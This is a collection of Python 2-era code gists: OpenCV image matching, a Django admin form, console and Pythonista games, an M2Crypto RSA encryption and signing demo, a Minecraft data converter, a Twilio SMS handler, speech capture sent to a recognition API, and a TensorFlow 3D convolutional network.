@param value: value to encrypt
@type value: string
@rtype: string
"""
return base64.b64encode(self.encrypt(key, value))
def decryptB64(self, key, value):
"""decrypt from base64
@param key: key to decrypt with
@type key: string
@param value: value to decrypt in base64
@type value: string
@rtype: string
"""
return self.decrypt(key,base64.b64decode(value))
if __name__ == "__main__":
import doctest
doctest.testmod()
```
#### File: hard-gists/5106221/snippet.py
```python
import numpy
import cv2
import sys
###############################################################################
# Image Matching
###############################################################################
def match_images(img1, img2):
"""Given two images, returns the matches"""
detector = cv2.SURF(400, 5, 5)
matcher = cv2.BFMatcher(cv2.NORM_L2)
kp1, desc1 = detector.detectAndCompute(img1, None)
kp2, desc2 = detector.detectAndCompute(img2, None)
#print 'img1 - %d features, img2 - %d features' % (len(kp1), len(kp2))
raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2
kp_pairs = filter_matches(kp1, kp2, raw_matches)
return kp_pairs
def filter_matches(kp1, kp2, matches, ratio = 0.75):
mkp1, mkp2 = [], []
for m in matches:
if len(m) == 2 and m[0].distance < m[1].distance * ratio:
m = m[0]
mkp1.append( kp1[m.queryIdx] )
mkp2.append( kp2[m.trainIdx] )
kp_pairs = zip(mkp1, mkp2)
return kp_pairs
###############################################################################
# Match Diplaying
###############################################################################
def explore_match(win, img1, img2, kp_pairs, status = None, H = None):
h1, w1 = img1.shape[:2]
h2, w2 = img2.shape[:2]
vis = numpy.zeros((max(h1, h2), w1+w2), numpy.uint8)
vis[:h1, :w1] = img1
vis[:h2, w1:w1+w2] = img2
vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR)
if H is not None:
corners = numpy.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = numpy.int32( cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0) )
cv2.polylines(vis, [corners], True, (255, 255, 255))
if status is None:
status = numpy.ones(len(kp_pairs), numpy.bool_)
p1 = numpy.int32([kpp[0].pt for kpp in kp_pairs])
p2 = numpy.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0)
green = (0, 255, 0)
red = (0, 0, 255)
white = (255, 255, 255)
kp_color = (51, 103, 236)
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier:
col = green
cv2.circle(vis, (x1, y1), 2, col, -1)
cv2.circle(vis, (x2, y2), 2, col, -1)
else:
col = red
r = 2
thickness = 3
cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness)
cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness)
cv2.line(vis, (x2-r, y2-r), (x2+r, y2+r), col, thickness)
cv2.line(vis, (x2-r, y2+r), (x2+r, y2-r), col, thickness)
vis0 = vis.copy()
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier:
cv2.line(vis, (x1, y1), (x2, y2), green)
cv2.imshow(win, vis)
def draw_matches(window_name, kp_pairs, img1, img2):
"""Draws the matches for """
mkp1, mkp2 = zip(*kp_pairs)
p1 = numpy.float32([kp.pt for kp in mkp1])
p2 = numpy.float32([kp.pt for kp in mkp2])
if len(kp_pairs) >= 4:
H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0)
#print '%d / %d inliers/matched' % (numpy.sum(status), len(status))
else:
H, status = None, None
#print '%d matches found, not enough for homography estimation' % len(p1)
if len(p1):
explore_match(window_name, img1, img2, kp_pairs, status, H)
###############################################################################
# Test Main
###############################################################################
if __name__ == '__main__':
"""Test code: Uses the two specified"""
if len(sys.argv) < 3:
print "No filenames specified"
print "USAGE: find_obj.py <image1> <image2>"
sys.exit(1)
fn1 = sys.argv[1]
fn2 = sys.argv[2]
img1 = cv2.imread(fn1, 0)
img2 = cv2.imread(fn2, 0)
if img1 is None:
print 'Failed to load fn1:', fn1
sys.exit(1)
if img2 is None:
print 'Failed to load fn2:', fn2
sys.exit(1)
kp_pairs = match_images(img1, img2)
if kp_pairs:
draw_matches('find_obj', kp_pairs, img1, img2)
cv2.waitKey()
cv2.destroyAllWindows()
else:
print "No matches found"
```
#### File: hard-gists/511440/snippet.py
```python
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth.admin import UserAdmin
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib import admin
class UserCreationFormExtended(UserCreationForm):
def __init__(self, *args, **kwargs):
super(UserCreationFormExtended, self).__init__(*args, **kwargs)
self.fields['email'] = forms.EmailField(label=_("E-mail"), max_length=75)
UserAdmin.add_form = UserCreationFormExtended
UserAdmin.add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'username', '<PASSWORD>', '<PASSWORD>',)
}),
)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
```
#### File: hard-gists/5181631/snippet.py
```python
import os, time, random
from collections import defaultdict
from System import Console, ConsoleColor, ConsoleKey
from System.Threading import Thread, ThreadStart
class Screen(object):
red = ConsoleColor.Red; green = ConsoleColor.Green; blue = ConsoleColor.Blue;black = ConsoleColor.Black
dimension = (21,39)
def __update_input(self):
mapping = defaultdict(lambda: None,
{ConsoleKey.A:Snake.left,ConsoleKey.J:Snake.left, ConsoleKey.LeftArrow:Snake.left,
ConsoleKey.D:Snake.right,ConsoleKey.L:Snake.right,ConsoleKey.RightArrow:Snake.right,
ConsoleKey.W:Snake.up,ConsoleKey.I:Snake.up,ConsoleKey.UpArrow:Snake.up,
ConsoleKey.S:Snake.down,ConsoleKey.K:Snake.down,ConsoleKey.DownArrow:Snake.down})
while True: self.last_input = mapping[Console.ReadKey(True).Key]
def __init__(self):
self.last_input = None; self.__input_update_thread = Thread(ThreadStart(self.__update_input)); self.__input_update_thread.Start()
os.system("cls") # os.system("clear")
Console.Title = "Snake by LuYU426"
        # The next line needs to be commented out on Unix-like systems. However, before running, the console needs to be adjusted accordingly
Console.CursorVisible = False; Console.WindowWidth = 80; Console.WindowHeight = 25;Console.BufferHeight = Console.WindowHeight; Console.BufferWidth = Console.WindowWidth
for i in range(0,24):
for j in range(0, 80):
if i == 0 or j == 0: self.__show(j, i, Screen.black, "#")
elif i == 22 or j == 79: self.__show(j, i, Screen.black,"#")
else: self.__show(j, i, Screen.black," ")
def __show(self,left,top,color,content): Console.CursorLeft = left; Console.CursorTop = top; Console.BackgroundColor = color; Console.Write(content)
def show_score(self,score): self.__show(3,23,Screen.black,"Score: {0}".format(score))
def color(self, position, width, height, color):
for row in range(position[0], position[0] + height):
for col in range(position[1], position[1] + width):
self.__show(col * 2 + 1,row + 1,color," ")
class GameLogic(object):
def update(self, screen, snake, fruit, stats):
stats.increase_score()
screen.show_score(stats.current_score)
update_result = snake.update(screen.last_input,fruit.current_position)
if update_result[0] == False: return True
if update_result[1] == True: return False
if update_result[2][0] < 0 or update_result[2][1] < 0: return False
if update_result[2][0] >= Screen.dimension[0] or update_result[2][1] >= Screen.dimension[1]: return False
screen.color(update_result[2],1,1,screen.green)
if update_result[3] is None:
fruit.reset_position()
while snake.position_in_buffer(fruit.current_position): fruit.reset_position()
screen.color(fruit.current_position,1,1,screen.red)
stats.increase_level()
else: screen.color(update_result[3],1,1,screen.black)
return True
def end(self): screen.color((0,0),39,21,Screen.blue)
class Snake(object):
up = 0x00; down = 0x01; left = 0x10; right = 0x11
def __init__(self):
self.__buffer = list(); self.__current_time_slice = 0
self.__buffer = [[Screen.dimension[0]/2 + 1,Screen.dimension[1]/2 + 1]]
self.__current_direction = Snake.up
def __current_speed(self):
_s = 8 - len(self.__buffer)/2
return 1 if _s < 1 else _s
def position_in_buffer(self, fruit_pos):
for item in self.__buffer:
if item == fruit_pos:
return True
return False
# returns [whether_need_update_screen(bool), whether_fail(bool), head_pos_to_draw(x,y), tail_pos_to_remove(x,y)]
def update(self, direction, fruit_pos):
self.__current_time_slice += 1
self.__current_time_slice %= self.__current_speed()
if self.__current_time_slice != 0: return [False, False]
if direction is None: direction = self.__current_direction
if direction ^ self.__current_direction == 0x01: direction = self.__current_direction
self.__current_direction = direction; candidate = [0, 0]; head = self.__buffer[len(self.__buffer) - 1]
candidate[0] = head[0] + 1 if self.__current_direction == Snake.down else head[0] - 1 if self.__current_direction == Snake.up else head[0]
candidate[1] = head[1] + 1 if self.__current_direction == Snake.right else head[1] - 1 if self.__current_direction == Snake.left else head[1]
if self.position_in_buffer(candidate): return [True, True]
if candidate == fruit_pos: self.__buffer.append(candidate); return [True, False, candidate, None]
else:
self.__buffer.append(candidate); tail = self.__buffer[0]; self.__buffer.remove(tail)
return [True, False, candidate, tail]
class Fruit(object):
def __init__(self): self.reset_position()
@property
def current_position(self): return self.__position
def reset_position(self): self.__position = [random.randint(0,Screen.dimension[0]-1),random.randint(0,Screen.dimension[1]-1)]
class Stastics(object):
def __init__(self): self.current_score = 0; self.__level = 0
def increase_score(self): self.current_score += 1
def increase_level(self): self.__level += 1; self.current_score += pow(2,self.__level-1)
if __name__ == "__main__":
screen = Screen(); logic = GameLogic(); stats = Stastics(); fruit = Fruit(); snake = Snake()
while snake.position_in_buffer(fruit.current_position): fruit.reset_position()
screen.color(fruit.current_position,1,1,screen.red)
while logic.update(screen, snake, fruit, stats): time.sleep(0.05)
logic.end()
```
#### File: hard-gists/5232301/snippet.py
```python
import os
import M2Crypto
def empty_callback():
return
# Seed the random number generator with 1024 random bytes (8192 bits)
M2Crypto.Rand.rand_seed(os.urandom(1024))
# Generate public/private key pair for Alice
print "Generating a 1024 bit private/public key pair for Alice..."
# If you don't like the default M2Crypto ASCII "progress"
# bar it makes when generating keys, you can use:
# Alice = M2Crypto.RSA.gen_key (1024, 65537, empty_callback)
# You can change the key size, though key lengths < 1024 are
# considered insecure
# The larger the key size the longer it will take to generate
# the key and the larger the signature will be when signing
# You should probably leave the public exponent at 65537
# (http://en.wikipedia.org/wiki/Rsa#Key_generation_2)
Alice = M2Crypto.RSA.gen_key(1024, 65537)
# Save Alice's private key
# The 'None' tells it to save the private key in an unencrypted format
# For best security practices, you'd use:
# Alice.save_key ('Alice-private.pem')
# That would cause the private key to be saved in an encrypted format
# Python would ask you to enter a password to use to encrypt the key file
# For a demo script though it's easier/quicker to just use 'None'
Alice.save_key('Alice-private.pem', None)
# Save Alice's public key
Alice.save_pub_key('Alice-public.pem')
# Generate public/private key pair for Bob
print "Generating a 1024 bit private/public key pair for Bob..."
Bob = M2Crypto.RSA.gen_key(1024, 65537)
Bob.save_key('Bob-private.pem', None)
Bob.save_pub_key('Bob-public.pem')
# Alice wants to send a message to Bob, which only Bob will be able to decrypt
# Step 1, load Bob's public key
WriteRSA = M2Crypto.RSA.load_pub_key('Bob-public.pem')
# Step 2, encrypt the message using that public key
# Only Bob's private key can decrypt a message encrypted using Bob's public key
CipherText = WriteRSA.public_encrypt(
"This is a secret message that can"
"only be decrypted with Bob's private key",
M2Crypto.RSA.pkcs1_oaep_padding)
# Step 3, print the result
print "\nAlice's encrypted message to Bob:"
print CipherText.encode('base64')
# Step 4 (optional), sign the message so Bob knows it really was from Alice
# 1) Generate a signature
MsgDigest = M2Crypto.EVP.MessageDigest('sha1')
MsgDigest.update(CipherText)
Signature = Alice.sign_rsassa_pss(MsgDigest.digest())
# 2) Print the result
print "Alice's signature for this message:"
print Signature.encode('base64')
# Bob wants to read the message he was sent
# Step 1, load Bob's private key
ReadRSA = M2Crypto.RSA.load_key('Bob-private.pem')
# Step 2, decrypt the message using that private key
# If you use the wrong private key to try to decrypt the message it
# generates an exception, so this catches the exception
try:
PlainText = ReadRSA.private_decrypt(
CipherText, M2Crypto.RSA.pkcs1_oaep_padding)
except:
print "Error: wrong key?"
PlainText = ""
if PlainText == "":
# Step 3, print the result of the decryption
print "Message decrypted by Bob:"
print PlainText
# Step 4 (optional), verify the message was really sent by Alice
# 1) Load Alice's public key
VerifyRSA = M2Crypto.RSA.load_pub_key('Alice-public.pem')
# 2 ) Verify the signature
print "Signature verificaton:"
MsgDigest = M2Crypto.EVP.MessageDigest('sha1')
MsgDigest.update(CipherText)
if VerifyRSA.verify_rsassa_pss(MsgDigest.digest(), Signature) == 1:
print "This message was sent by Alice.\n"
else:
print "This message was NOT sent by Alice!\n"
# Generate a signature for a string
# Use Bob's private key
SignEVP = M2Crypto.EVP.load_key('Bob-private.pem')
# Begin signing
SignEVP.sign_init()
# Tell it to sign our string
SignEVP.sign_update(
'This is an unencrypted string that will be signed by Bob')
# Get the final result
StringSignature = SignEVP.sign_final()
# Print the final result
print "Bob's signature for the string:"
print StringSignature.encode('base64')
# Verify the string was signed by Bob
PubKey = M2Crypto.RSA.load_pub_key('Bob-public.pem')
# Initialize
VerifyEVP = M2Crypto.EVP.PKey()
# Assign the public key to our VerifyEVP
VerifyEVP.assign_rsa(PubKey)
# Begin verification
VerifyEVP.verify_init()
# Tell it to verify our string, if this string is not identicial to the
# one that was signed, it will fail
VerifyEVP.verify_update(
'This is an unencrypted string that will be signed by Bob')
# Was the string signed by Bob?
if VerifyEVP.verify_final(StringSignature) == 1:
print "The string was successfully verified."
else:
print "The string was NOT verified!"
```
#### File: hard-gists/5263533/snippet.py
```python
import sys
import yaml
import json
def convert(infile):
x = yaml.load(open(infile, 'r').read())
print "Converting"
print x
for container in x['SURVIVAL']:
print "Entering " + container
x['SURVIVAL'][container] = json.loads(x['SURVIVAL'][container])
if container in ('potion', 'stats', 'bedSpawnLocation'):
continue # nothing to do here.
for item in x['SURVIVAL'][container]:
# Do some magic here..
print " Found a %s at pos %s" %(x['SURVIVAL'][container][item]['is']['type'], item)
val = x['SURVIVAL'][container][item]
if val.has_key('is'):
print ' - Fixing "is" -> "==":"org.bukkit.inventory.ItemStack"'
t = val['is']
t['=='] = "org.bukkit.inventory.ItemStack"
del val['is']
val = t
if val.has_key('meta'):
print ' - Fixing meta with "==": "ItemMeta",'
val['meta']['=='] = 'ItemMeta'
x['SURVIVAL'][container][item] = val
print "Returning as serialised json"
return json.dumps(x)
### main loop
if __name__ == '__main__':
for x in sys.argv[1:]:
print "Converting %s" % x
outfile = x.replace('.yml', '.json')
out = convert(x)
of = open(outfile, 'w')
of.write(out)
of.close()
```
#### File: hard-gists/5267494/snippet.py
```python
import webapp2
from twilio import twiml
from twilio.rest import TwilioRestClient
class SendSMS(webapp2.RequestHandler):
def get(self):
# replace with your credentials from: https://www.twilio.com/user/account
account_sid = "ACxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
auth_token = "xxxxxxxxxxxxxxxxxxxxxxxxxx"
client = TwilioRestClient(account_sid, auth_token)
# replace "to" and "from_" with real numbers
rv = client.sms.messages.create(to="+14155551212",
from_="+14085551212",
body="Hello Monkey!")
self.response.write(str(rv))
app = webapp2.WSGIApplication([('/send_sms', SendSMS)],
debug=True)
```
#### File: hard-gists/5284646/snippet.py
```python
import os
import sys
import atexit
import json
import time
import tempfile
import wave
import traceback
import urllib2
from subprocess import check_output
from Queue import Queue, Empty
import numpy as np
import pyaudio
class Spectrum(object):
FORMAT = pyaudio.paFloat32
CHANNELS = 1
FRAME_SIZE = 512
RATE = 16000 # Hz
def frames(self, n):
return int(n*self.RATE/self.FRAME_SIZE)
def __init__(self):
self.speak = Queue()
self.pa = pyaudio.PyAudio()
self.last_samples = None
atexit.register(self.pa.terminate)
        # Compute the frequency values corresponding to the FFT result indices. Not used this time.
# self.freq = np.fft.fftfreq(self.FRAME_SIZE, d=self.RATE**-1)
self.begin = self.FRAME_SIZE*3/8
self.end = self.FRAME_SIZE/2
self.fque = np.zeros((self.frames(1.0), self.end-self.begin), np.float32)
self.buff = np.zeros((self.frames(5.0), 512), np.float32)
def fft(self, samples):
win = np.hanning(len(samples))
res = np.fft.fftshift(np.fft.fft(win*samples))
return 20*np.log10(np.abs(res))
def callback(self, in_data, frame_count, time_info, status):
try:
data = np.fromstring(in_data, np.float32)
self.buff[0] = data
self.buff = np.roll(self.buff, -1, axis=0)
            if self.status == 0: # once speech extraction has started, pause updating the ambient-noise average
self.fque = np.roll(self.fque, 1, axis=0)
self.fque[0] = self.fft(data)[self.begin:self.end]
            # this is the average of the ambient-noise component
average = np.average(self.fque, axis=0)
            values = self.fque[0] - average # subtract the ambient average from the FFT result
volume = np.average(values)
if self.status:
self.count += 1
else:
                self.count = 0
if self.status < 5:
if volume>5:
self.status += 1
else:
self.status = 0
elif self.status == 5:
if volume<5:
self.status += 1
elif self.status < 15:
if volume<5:
self.status += 1
else:
self.status -= 1
else:
self.status = 0
self.speak.put(self.buff[-self.count-2:])
if self.debug:
pr = [min(9, max(0, int(v/10))) for v in values]
print ''.join([str(i) for i in pr]), self.status
return (in_data, self.recording)
except KeyboardInterrupt:
self.recording = pyaudio.paAbort
def start(self, debug=False):
self.debug = debug
self.status = 0
self.count = 0
self.recording = pyaudio.paContinue
self.stream = self.pa.open(format = self.FORMAT,
channels = self.CHANNELS,
rate = self.RATE,
input = True,
output = False,
frames_per_buffer = self.FRAME_SIZE,
stream_callback = self.callback)
self.stream.start_stream()
def stop(self):
self.recording = pyaudio.paAbort
while self.stream.is_active():
time.sleep(0.5)
self.stream.start_stream()
self.stream.close()
RECOGNIZE_URL = "https://www.google.com/speech-api/v1/recognize?xjerr=1&client=chromium&lang=ja-JP"
# RECOGNIZE_URL += "&maxresult=10" # これで候補のトップ10が返る。
FLAC_TOOL = 'flac'
def recognize(fpath):
flac = open(fpath,"rb").read()
header = {'Content-Type' : 'audio/x-flac; rate=16000'}
req = urllib2.Request(RECOGNIZE_URL, flac, header)
data = urllib2.urlopen(req)
params = json.loads(data.read())
return params
def main(spe):
while 1:
try:
buff = spe.speak.get(timeout=3)
with tempfile.NamedTemporaryFile(suffix='.wav') as fp:
f = wave.open(fp, 'w')
f.setnchannels(1)
f.setsampwidth(2)
f.setframerate(16000)
f.writeframes(np.int16(buff*32768).tostring())
f.close()
check_output([FLAC_TOOL, '-sf', fp.name])
output = os.path.splitext(fp.name)[0] + '.flac'
res = recognize(output)
for i in res.get('hypotheses', []):
print i['confidence'], i['utterance']
except KeyboardInterrupt:
raise SystemExit(0)
except Empty:
pass
except:
traceback.print_exc()
time.sleep(5)
if __name__=='__main__':
spe = Spectrum()
spe.start(False)
try:
main(spe)
finally:
spe.stop()
```
#### File: hard-gists/5297676/snippet.py
```python
from scene import *
from random import randint, choice
from math import cos, sin
screen_size = Size(768, 1024)
score = 0
def update_score(n=1):
global score
if n == 'reset':
score = 0
else:
score += n
class Field(object):
def __init__(self):
size = screen_size
self.lines = [(0, 0, 0, size.h), (size.w, 0, size.w, size.h), (0, size.h, size.w, size.h), (0, screen_size.h/2, screen_size.w, screen_size.h/2)]
def draw(self):
stroke_weight(3)
ellipse(screen_size.w/2-10, screen_size.h/2-10, 20, 20)
for l in self.lines:
line(*l)
class Player(object):
def __init__(self):
self.rect = Rect(screen_size.w/2-50, 50, 100, 20)
self.pos = self.rect.center()
self.size = self.rect.size()
self.lives = 3
def update(self):
g = gravity()
self.rect.x += g.x * 50
self.rect.x = min(screen_size.w - 100, max(0, self.rect.x))
def draw(self):
rect(*self.rect)
class Ball(object):
def __init__(self):
self.radius = 10
self.pos = Point(screen_size.w/2-self.radius, screen_size.h/2-self.radius)
self.rect = Rect(self.pos.x, self.pos.y, self.radius*2, self.radius*2)
self.vx = choice((randint(-4, -1), randint(1, 4)))
self.vy = randint(3, 5)
def collide_with_paddle(self, object1):
if self.rect.intersects(object1.rect):
self.rect.y = object1.rect.top()
self.bounce('y')
update_score()
pos = self.rect.center().x - object1.rect.center().x
self.vx = pos/10
def bounce(self, direction='y'):
if direction == 'y':
self.vy *= -1
elif direction =='x':
self.vx *= -1
def update(self):
self.rect.x += self.vx
self.rect.y += self.vy
if self.rect.x + self.radius >= screen_size.w:
self.rect.x = screen_size.w - self.radius
self.bounce('x')
if self.rect.x - self.radius <= 0:
self.rect.x = self.radius
self.bounce('x')
if self.rect.y + self.radius >= screen_size.h:
self.rect.y = screen_size.h - self.radius
self.bounce('y')
def draw(self):
fill(1,1,0)
no_stroke()
ellipse(*self.rect)
class Game(Scene):
def setup(self):
self.frame_count = 0
self.field = Field()
self.p1 = Player()
self.balls = []
def add_ball(self, n=1):
self.balls.append(Ball())
def draw(self):
self.frame_count = (self.frame_count + 1) % 1600
if self.frame_count % 1600 == 0:
self.add_ball()
if len(self.balls) == 0:
self.add_ball()
text('Score: %s' % score, x=screen_size.w/2, y=screen_size.h-50, font_size=25)
text('Lives: %s' % self.p1.lives, x=100, y=screen_size.h-50, font_size=24)
text('Balls: %s' % len(self.balls), x=screen_size.w-100, y=screen_size.h-50, font_size=24)
self.field.draw()
self.p1.update()
self.p1.draw()
for ball in self.balls:
ball.update()
ball.draw()
ball.collide_with_paddle(self.p1)
if ball.rect.y < -ball.rect.h/2:
self.p1.lives -= 1
del self.balls[self.balls.index(ball)]
if self.p1.lives < 1:
main_scene.switch_scene(GameoverScreen())
class StartScreen(Scene):
def setup(self):
self.pos = Point(screen_size.w/2, screen_size.h/2)
self.info = '''
The goal of the game is to keep the ball(s) inside the field for as long as you possibly
can. Whenever a ball bounces on the paddle, you are rewarded with a point. You have three
        lives. If a ball passes the paddle, you will lose a life.
Touch anywhere on the screen to start'''
def draw(self):
text(self.info, x=self.pos.x, y=self.pos.y, font_size=18, alignment=5)
def touch_began(self, touch):
main_scene.switch_scene(Game())
class GameoverScreen(Scene):
def setup(self):
self.text = 'Game Over!'
def draw(self):
text(self.text, x=screen_size.w/2, y=screen_size.h/2, font_size=64, alignment=5)
def touch_began(self, touch):
main_scene.switch_scene(Game())
class MultiScene (Scene):
def __init__(self, start_scene):
self.active_scene = start_scene
self.tmp_t = 0
def switch_scene(self, new_scene):
self.active_scene = new_scene
self.setup()
def setup(self):
global screen_size
screen_size = self.size
self.tmp_t = self.t
self.active_scene.setup()
def draw(self):
background(0,0,0)
fill(1,1,1)
self.active_scene.touches = self.touches
self.active_scene.t = self.t - self.tmp_t
self.active_scene.draw()
def touch_began(self, touch):
self.active_scene.touch_began(touch)
def touch_moved(self, touch):
self.active_scene.touch_moved(touch)
def touch_ended(self, touch):
self.active_scene.touch_ended(touch)
main_scene = MultiScene(StartScreen())
run(main_scene, PORTRAIT)
```
#### File: hard-gists/5297697/snippet.py
```python
from scene import *
class MyScene (Scene):
def setup(self):
self.xybegin = Point(0,0)
self.lines = []
def draw(self):
background(0, 0, 0)
fill(0, 0, 1)
stroke(0, 0, 1)
stroke_weight(3)
for l in self.lines:
line(*l)
text(str(len(self.lines)), x=100,y=100)
def touch_began(self, touch):
x = touch.location.x
y = touch.location.y
self.xybegin = Point(x,y)
def touch_moved(self, touch):
x = touch.location.x
y = touch.location.y
ppos = touch.prev_location
self.lines.append((ppos.x, ppos.y, x, y))
def touch_ended(self, touch):
x = touch.location.x
y = touch.location.y
ppos = touch.prev_location
self.lines.append((ppos.x, ppos.y, x, y))
run(MyScene())
```
#### File: hard-gists/52bba57f724e38229da9d85fbc85b673/snippet.py
```python
import tensorflow as tf
import numpy as np
FC_SIZE = 1024
DTYPE = tf.float32
def _weight_variable(name, shape):
return tf.get_variable(name, shape, DTYPE, tf.truncated_normal_initializer(stddev=0.1))
def _bias_variable(name, shape):
return tf.get_variable(name, shape, DTYPE, tf.constant_initializer(0.1, dtype=DTYPE))
def inference(boxes, dataconfig):
prev_layer = boxes
in_filters = dataconfig.num_props
with tf.variable_scope('conv1') as scope:
out_filters = 16
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias, name=scope.name)
prev_layer = conv1
in_filters = out_filters
pool1 = tf.nn.max_pool3d(prev_layer, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1], padding='SAME')
norm1 = pool1 # tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta = 0.75, name='norm1')
prev_layer = norm1
with tf.variable_scope('conv2') as scope:
out_filters = 32
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(bias, name=scope.name)
prev_layer = conv2
in_filters = out_filters
# normalize prev_layer here
prev_layer = tf.nn.max_pool3d(prev_layer, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1], padding='SAME')
with tf.variable_scope('conv3_1') as scope:
out_filters = 64
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
prev_layer = tf.nn.relu(bias, name=scope.name)
in_filters = out_filters
with tf.variable_scope('conv3_2') as scope:
out_filters = 64
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
prev_layer = tf.nn.relu(bias, name=scope.name)
in_filters = out_filters
with tf.variable_scope('conv3_3') as scope:
out_filters = 32
kernel = _weight_variable('weights', [5, 5, 5, in_filters, out_filters])
conv = tf.nn.conv3d(prev_layer, kernel, [1, 1, 1, 1, 1], padding='SAME')
biases = _bias_variable('biases', [out_filters])
bias = tf.nn.bias_add(conv, biases)
prev_layer = tf.nn.relu(bias, name=scope.name)
in_filters = out_filters
# normalize prev_layer here
prev_layer = tf.nn.max_pool3d(prev_layer, ksize=[1, 3, 3, 3, 1], strides=[1, 2, 2, 2, 1], padding='SAME')
with tf.variable_scope('local3') as scope:
dim = np.prod(prev_layer.get_shape().as_list()[1:])
prev_layer_flat = tf.reshape(prev_layer, [-1, dim])
weights = _weight_variable('weights', [dim, FC_SIZE])
biases = _bias_variable('biases', [FC_SIZE])
local3 = tf.nn.relu(tf.matmul(prev_layer_flat, weights) + biases, name=scope.name)
prev_layer = local3
with tf.variable_scope('local4') as scope:
dim = np.prod(prev_layer.get_shape().as_list()[1:])
prev_layer_flat = tf.reshape(prev_layer, [-1, dim])
weights = _weight_variable('weights', [dim, FC_SIZE])
biases = _bias_variable('biases', [FC_SIZE])
local4 = tf.nn.relu(tf.matmul(prev_layer_flat, weights) + biases, name=scope.name)
prev_layer = local4
with tf.variable_scope('softmax_linear') as scope:
dim = np.prod(prev_layer.get_shape().as_list()[1:])
weights = _weight_variable('weights', [dim, dataconfig.num_classes])
biases = _bias_variable('biases', [dataconfig.num_classes])
softmax_linear = tf.add(tf.matmul(prev_layer, weights), biases, name=scope.name)
return softmax_linear
def loss(logits, labels):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
logits, labels, name='cross_entropy_per_example')
return tf.reduce_mean(cross_entropy, name='xentropy_mean')
```
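The two functions above only build the graph. Below is a minimal driver sketch; `DataConfig`, the 32×32×32 box size, the placeholders and the Adam optimizer are assumptions made purely for illustration (they are not part of the gist), and TensorFlow 1.x semantics are assumed throughout.
```python
# Hypothetical driver for the inference()/loss() graph above.
# DataConfig, the 32x32x32 box size, and the optimizer are illustrative
# assumptions only; TensorFlow 1.x is assumed.
import collections
import tensorflow as tf

DataConfig = collections.namedtuple('DataConfig', ['num_props', 'num_classes'])
dataconfig = DataConfig(num_props=1, num_classes=10)

# conv3d expects NDHWC input: [batch, depth, height, width, channels]
boxes = tf.placeholder(DTYPE, [None, 32, 32, 32, dataconfig.num_props])
labels = tf.placeholder(DTYPE, [None, dataconfig.num_classes])  # one-hot labels

logits = inference(boxes, dataconfig)
total_loss = loss(logits, labels)
train_op = tf.train.AdamOptimizer(1e-4).minimize(total_loss)
```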
#### File: hard-gists/5305895/snippet.py
```python
from scene import *
from sound import play_effect
from random import randint
def centered_rect(x, y, w, h):
return Rect(x-w/2, y-h/2, w, h)
class Field(object):
def __init__(self):
size = screen_size
left = 0
bottom = 0
right = screen_size.w
top = screen_size.h
self.lines = [(left, bottom, left, top), (left, top, right, top), (right, top, right, bottom)]
def draw(self):
stroke_weight(4)
stroke(1,1,1)
for l in self.lines:
line(*l)
class Player(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 50, 100, 20)
self.lives = 3
def update(self):
self.rect.x += gravity().x * 50
self.rect.x = min(screen_size.w - 100, max(0, self.rect.x))
def draw(self):
fill(1,1,1)
rect(*self.rect)
class Ball(object):
def __init__(self):
self.rect = centered_rect(screen_size.w/2, 60, 20, 20)
self.vx = randint(-6, 6)
self.vy = 7
self.is_moving = False
def collide_with_paddle(self, paddle):
if self.rect.intersects(paddle.rect):
self.rect.y = paddle.rect.top()
self.vy *= -1
pos = self.rect.center().x - paddle.rect.center().x
self.vx = pos/10
play_effect('Jump_3')
def collide_with_block(self, block):
if self.rect.intersects(block.rect):
if self.rect.intersects(block.left):
self.rect.x = block.rect.left()-self.rect.w
self.vx = -abs(self.vx)
elif self.rect.intersects(block.right):
self.rect.x = block.rect.right()
self.vx = abs(self.vx)
elif self.rect.intersects(block.top):
self.rect.y = block.rect.top()
self.vy = abs(self.vy)
elif self.rect.intersects(block.bottom):
self.rect.y = block.rect.bottom()-self.rect.h
self.vy = -abs(self.vy)
return True
def update(self, dt):
self.rect.x += self.vx + dt*10
self.rect.y += self.vy + dt*10
if self.rect.right() >= screen_size.w:
self.rect.x = screen_size.w - self.rect.w
self.vx *= -1
play_effect('Jump_5')
if self.rect.left() <= 0:
self.rect.x = 0
self.vx *= -1
play_effect('Jump_5')
if self.rect.top() >= screen_size.h:
self.rect.y = screen_size.h - self.rect.w
self.vy *= -1
play_effect('Jump_5')
def draw(self):
fill(1,1,0)
